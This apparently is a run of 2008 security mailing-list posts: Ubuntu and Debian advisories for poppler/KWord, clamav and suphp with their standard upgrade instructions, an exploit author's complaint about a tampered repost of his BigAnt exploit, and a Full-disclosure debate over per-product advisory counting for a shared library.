USN-603-1 fixed vulnerabilities in poppler. This update provides the corresponding updates for KWord, part of KOffice.

Original advisory details:

It was discovered that the poppler PDF library did not correctly handle certain malformed embedded fonts. If a user or an automated system were tricked into opening a malicious PDF, a remote attacker could execute arbitrary code with user privileges.
Updated packages for Ubuntu 6.06 LTS:
Re: BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)
Hello guys, just wanted to let you know that the BigAnt exploit posted on securityfocus at http://www.securityfocus.com/bid/28795 on Apr 15th 2008 and at http://www.milw0rm.org/exploits/5451 was reposted the same day on bugtraq by some really stupid guy who changed my references with some porn site!! I'm not going to repost those links because I don't want to give to him free advertising. Just wanted to let you know that I'm not involved in that stuff. Thx for your attention, Matteo Memelli (ryujin)
[SECURITY] [DSA 1549-1] New clamav packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Debian Security Advisory DSA-1549-1   [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
April 17, 2008   http://www.debian.org/security/faq

Package: clamav
Vulnerability : buffer overflows
Problem type : remote
Debian-specific: no
CVE Id(s) : CVE-2008-0314 CVE-2008-1100

Several remote vulnerabilities have been discovered in the Clam anti-virus toolkit. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2008-0314
Damian Put discovered that a buffer overflow in the handler for PeSpin binaries may lead to the execution of arbitrary code.

CVE-2008-1100
Alin Rad Pop discovered that a buffer overflow in the handler for Upack PE binaries may lead to the execution of arbitrary code.

no CVE yet
Damian Put and Thomas Pollet discovered that a buffer overflow in the handler for WWPack-compressed PE binaries may lead to the execution of arbitrary code.

For the stable distribution (etch) these problems have been fixed in version 0.90.1-3etch11.

For the unstable distribution (sid) these problems have been fixed in version 0.92.1~dfsg2-1.

We recommend that you upgrade your clamav packages.

Upgrade instructions

wget url
    will fetch the file for you
dpkg -i file.deb
    will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
    will update the internal database
apt-get upgrade
    will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian 4.0 (stable)

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc and s390.
Re: [Full-disclosure] Secunia Research: Lotus Notes Folio Flat File Parsing Buffer Overflows
When examining advisory SA28209 http://secunia.com/advisories/28209/ it points to reports listing vulnerabilities in several products and versions (Verity KeyView Viewer SDK 7.x, 8.x, and 9.x) etc. Secunia's Web site lists advisories by a specific product too, see http://secunia.com/product/5570/?task=advisories

I believe this is the reason for several advisories.

Juha-Matti

Erik Harrison [EMAIL PROTECTED] wrote:
> It's not always easy to know what libs all of your apps are using. Unless of course you're managing a small set of systems, have a lot of time, or are particularly godlike at what you do.
>
> I think it's great that they identify the software using it. Frankly, if I'm in an enterprise environment running Lotus for some god awful reason, that's going to get my attention more than one of its libraries.
>
> Yes, it does inflate their stats on number of vuln advisories published in a year, but whatever - I don't care about that.
>
> What's the better way to deal with it? Try and push one advisory listing 1000 apps affected in its content? Even then, you're not going to have an accurate list.
>
> I think it -is- better to publish one advisory per affected piece of software. When I'm skimming the 100 or so that hit my inbox every day, I don't have the luxury of opening each one. Unfortunate, but that's reality of most security staff.
>
> It's only going to get worse. Reporting is going to increase and threats are going to apply to far more products inheriting the same code. What's the best, most scalable way of dealing with this? Anyone have any ideas on that one?
>
> On Tue, Apr 15, 2008 at 10:20 AM, Luigi Auriemma [EMAIL PROTECTED] wrote:
>> Autonomy Keyview Folio Flat File Parsing Buffer Overflows
>> Autonomy Keyview Applix Graphics Parsing Vulnerabilities
>> Autonomy Keyview EML Reader Buffer Overflows
>> activePDF DocConverter Folio Flat File Parsing Buffer Overflows
>> activePDF DocConverter Applix Graphics Parsing Vulnerabilities
>> Lotus Notes Applix Graphics Parsing Vulnerabilities
>> Lotus Notes Folio Flat File Parsing Buffer Overflows
>> Lotus Notes EML Reader Buffer Overflows
>> Lotus Notes kvdocve.dll Path Processing Buffer Overflow
>> Lotus Notes htmsr.dll Buffer Overflows
>> Symantec Mail Security Folio Flat File Parsing Buffer Overflows
>> Symantec Mail Security Applix Graphics Parsing Vulnerabilities
>>
>> 12 mails for the same library?
>>
>> From what I have understood all the bugs are just in this Autonomy Keyview library so in my opinion reporting the same identical bugs in each software which uses this third-party component and additionally without saying that the problem in reality is in the library is wrong and leads to a lot of confusion.
>>
>> It's just like if someone finds a bug in zlib and releases 1 advisories, one for each program in the world which uses the library... the bug is not in these 1 programs but only in zlib.
>>
>> ---
>> Luigi Auriemma
>> http://aluigi.org
[SECURITY] [DSA 1550-1] New suphp packages fix local privilege escalation
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Debian Security Advisory DSA-1550-1   [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
April 17, 2008   http://www.debian.org/security/faq

Package: suphp
Vulnerability : programming error
Problem type : local
Debian-specific: no
CVE Id(s) : CVE-2008-1614
Debian Bug : 475431

It was discovered that suphp, an Apache module to run PHP scripts with owner permissions, handles symlinks insecurely, which may lead to privilege escalation by local users.

For the stable distribution (etch), this problem has been fixed in version 0.6.2-1+etch0.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your suphp packages.

Upgrade instructions

wget url
    will fetch the file for you
dpkg -i file.deb
    will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
    will update the internal database
apt-get upgrade
    will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian 4.0 (stable)

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc and s390.